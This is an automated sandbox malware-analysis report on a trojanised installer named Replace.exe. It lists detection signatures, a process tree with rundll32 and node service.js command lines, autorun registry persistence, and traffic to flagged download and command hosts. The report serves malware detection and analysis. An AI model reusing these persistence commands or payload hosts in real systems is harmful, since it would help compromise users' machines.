Windows Analysis Report
Replace.exe

Overview

General Information

Sample name:Replace.exe
Analysis ID:1434556
MD5:fd5cd14325c51ecab6a57d1d665f8852
SHA1:ea16aa0f197210437733c63a42a8f1dd6442d753
SHA256:d433cd0ba6b6850a9f616b3b89754a005699547d4e04fadb75cade770156cfd1
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses known network protocols on non-standard ports
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Replace.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\Replace.exe" MD5: FD5CD14325C51ECAB6A57D1D665F8852)
    • rundll32.exe (PID: 7608 cmdline: rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: 889B99C52A60DD49227C5E485A016679)
      • wnsA071.tmp (PID: 8912 cmdline: wscsu.exe /S /VERPOSTFIX=bt MD5: 7A506A2E92BC66A9F64C2333A815E97A)
        • cleaner.exe (PID: 8952 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" MD5: E9DED10DFF258F6522FE9079ED3319CA)
          • node.exe (PID: 8964 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js" MD5: 5F40521D2E1082FE1C734610C4A83911)
            • WMIC.exe (PID: 9008 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 9036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 9152 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 1720 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 8428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 8600 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 8620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7252 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 5668 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 8732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 2312 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6188 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6548 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6828 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6540 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • run.exe (PID: 7680 cmdline: .\run.exe MD5: D77C3EF3EFA7E38EF91137466EEE801B)
  • chrome.exe (PID: 7744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2272,i,3908760233601738939,4589788007160690134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • rundll32.exe (PID: 8332 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 8344 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: 889B99C52A60DD49227C5E485A016679)
      • wnsCCC1.tmp (PID: 4040 cmdline: wscsu.exe /S /VERPOSTFIX=bt MD5: 7A506A2E92BC66A9F64C2333A815E97A)
        • cleaner.exe (PID: 5924 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P MD5: E9DED10DFF258F6522FE9079ED3319CA)
        • cleaner.exe (PID: 8312 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" MD5: E9DED10DFF258F6522FE9079ED3319CA)
          • node.exe (PID: 8296 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js" MD5: 5F40521D2E1082FE1C734610C4A83911)
            • WMIC.exe (PID: 2836 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
  • rundll32.exe (PID: 8648 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 8660 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: 889B99C52A60DD49227C5E485A016679)
      • wnsF0F3.tmp (PID: 7708 cmdline: wscsu.exe /S /VERPOSTFIX=bt MD5: 7A506A2E92BC66A9F64C2333A815E97A)
        • cleaner.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P MD5: E9DED10DFF258F6522FE9079ED3319CA)
        • cleaner.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" MD5: E9DED10DFF258F6522FE9079ED3319CA)
          • node.exe (PID: 3912 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js" MD5: 5F40521D2E1082FE1C734610C4A83911)
            • WMIC.exe (PID: 8480 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleaner.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" MD5: E9DED10DFF258F6522FE9079ED3319CA)
    • node.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js" MD5: 5F40521D2E1082FE1C734610C4A83911)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cleaninethelper
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cleaninethelper
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\wnsA071.tmp, ProcessId: 8912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
No Snort rule has matched

AV Detection

Source: https://files.nflxso.ca/downloads/winapp/latest-version.txt1%Avira URL Cloud: Label: malware
Source: https://files.nflxso.ca/downloads/winapp/latest-installer.exe3Avira URL Cloud: Label: malware
Source: https://files.nflxso.ca/downloads/winapp/latest-installer.exe-Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp, Avira: detection malicious, Label: PUA/Agent.clw
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp, Avira: detection malicious, Label: PUA/Agent.clw
Source: C:\Users\user\AppData\Local\Temp\wsc86FC.tmp, Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp, Avira: detection malicious, Label: PUA/Agent.clw
Source: files.nflxso.ca, Virustotal: Detection: 6%
Source: https://files.nflxso.ca/d, Virustotal: Detection: 5%
Source: http://files.nflxso.ca/downloads/winapp/latest-version.txt, Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe, ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe, Virustotal: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp, ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp, Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp, ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp, Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp, ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp, Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Temp\wsc86FC.tmp, ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\wsc86FC.tmp, Virustotal: Detection: 66%
Source: Replace.exe, ReversingLabs: Detection: 28%
Source: Replace.exe, Virustotal: Detection: 49%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe, Joe Sandbox ML: detected
Source: Replace.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Directory created: C:\Program Files\Image-Line
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Directory created: C:\Program Files\Image-Line\FL Studio 20
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Directory created: C:\Program Files\Image-Line\FL Studio 20\__tmp_rar_sfx_access_check_5937078
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Directory created: C:\Program Files\Image-Line\FL Studio 20\FL64.exe
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Directory created: C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll
Source: unknown, HTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: Replace.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Tue Mar 15 17:28:15 2022 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"not available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Replace.exe, 00000000.00000003.1668526597.0000000004074000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000000.1694241390.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp, run.exe, 00000002.00000003.1696934689.0000019819FC2000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp, run.exe, 00000002.00000003.1701249383.00000198188A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\ws\out\Release\node.pdb source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmp
Source: C:\Users\user\Desktop\Replace.exe, Code function: 0_2_00BB2EFC FindFirstFileA,FindFirstFileW,0_2_00BB2EFC
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Code function: 2_2_00007FF75FB9B8F8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_00007FF75FB9B8F8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Code function: 2_2_00007FF75FBC0870 FindFirstFileExA,2_2_00007FF75FBC0870
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe, Code function: 2_2_00007FF75FBB0310 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,2_2_00007FF75FBB0310
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp, Code function: 13_2_0040672B FindFirstFileW,FindClose,13_2_0040672B
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp, Code function: 13_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_00405AFA
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp, Code function: 13_2_00402868 FindFirstFileW,13_2_00402868
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp, Code function: 20_2_0040672B FindFirstFileW,FindClose,20_2_0040672B
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp, Code function: 20_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_00405AFA
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp, Code function: 20_2_00402868 FindFirstFileW,20_2_00402868
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe, File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe, File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper

Networking

Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 172.67.152.151 443
Source: unknown, Network traffic detected: HTTP traffic on port 49757 -> 6101
Source: unknown, Network traffic detected: HTTP traffic on port 6101 -> 49757
Source: global traffic, TCP traffic: 192.168.2.4:49757 -> 74.201.73.52:6101
Source: global trafficHTTP traffic detected: GET /strvn HTTP/1.1Sec-WebSocket-Version: 13Sec-WebSocket-Key: R0PH52ZGGW4pHocLPSKo4A==Connection: UpgradeUpgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: register.nflxso.ca:6101
Source: Joe Sandbox View, IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View, IP Address: 74.201.73.52 74.201.73.52
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown, TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown, TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown, TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown, TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: global trafficHTTP traffic detected: GET /downloads/winapp/latest-installer.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999Host: files.nflxso.ca
Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kPRasndGkvlenHk&MD=zHV46mV7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kPRasndGkvlenHk&MD=zHV46mV7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /downloads/winapp/latest-version.txt HTTP/1.1user-agent: got (https://github.com/sindresorhus/got)accept-encoding: gzip, deflate, brHost: files.nflxso.caConnection: close
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .webmopenhttps://www.youtube.com/uploadexplore equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: files.nflxso.ca
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: apis.google.com
Source: global trafficDNS traffic detected: DNS query: register.nflxso.ca
